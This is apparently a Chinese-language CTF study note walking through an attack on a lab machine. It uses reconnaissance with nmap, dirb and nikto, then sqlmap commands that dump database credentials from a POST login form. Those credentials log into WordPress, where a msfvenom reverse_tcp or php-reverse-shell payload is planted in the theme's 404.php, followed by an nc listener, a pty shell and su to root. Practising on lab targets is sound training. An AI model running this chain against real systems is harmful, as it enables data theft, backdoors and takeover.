我的CTF学习与教学之旅笔记6

sql注入之post：

nmap -A -T4 -v 靶场IP地址

对web'站点扫描一定要dirb、 nikto 相结合，查找信息没特别是一些登录界面如：login admin等界面

80端口可用的东西：

phpadmin

利用owasp-zap对漏洞进行扫描

login.php一个登陆界面（nikto搜索到的）,要先尝试一下弱口令，再考虑是否有注入点（sqlmap）

 

8080端口可用的东西：

利用owasp-zap对漏洞进行扫描

/img目录

/wordpress

 

启动Burpsuite对的网站进行post扫描：

         首先在浏览器中设置代理端口；

          在burpsuite中的“proxy”标签中设置option,并观察intercept标签内容

         填写好信息，提交，并在burpsuite截断相关信息，全部截取intercept标签内容，并保存到一个request.raw文件

sqlmap -r request.raw --level=5 --risk=3 --dbs --dbms mysql --batch

sqlmap -r request.raw --level=5 --risk=3 -D 数据库 --tables --dbms mysql --batch 

sqlmap -r request.raw --level=5 --risk=3 -D 数据库 -T 数据表 --columns --dbms mysql --batch 

sqlmap -r request.raw --level=5 --risk=3 -D 数据库 -T 数据表 -C 字段列表 --dbms mysql --batch --dump

至此，可以看到数据

利用获取到的用户名和密码登录到wordpress/wp-login.php

接下来就可以利用网站漏洞，拿权限了

1.可以用msfvenom -p php/meterpreter/reverse_tcp -f raw 生成木马的PHP文件，将该文件内容利用wordpress的themes下的editor，修改404.php文件模板，这种方式要启动msfconsole，use exploit/multi/handler,并加载相关载荷。

2.也可以直接利用kali系统中的/usr/share/webshells/php/php-reverse-shell.php中的内容，改写上述的404.php文件。这种方式接下来要用nc -nlvp 端口号进行监听

python -c "import pty;pty.spawn('/bin/bash')"

cat /etc/passwd 

su - 进行root 提权，密码可以参考用sqlmap得到的密码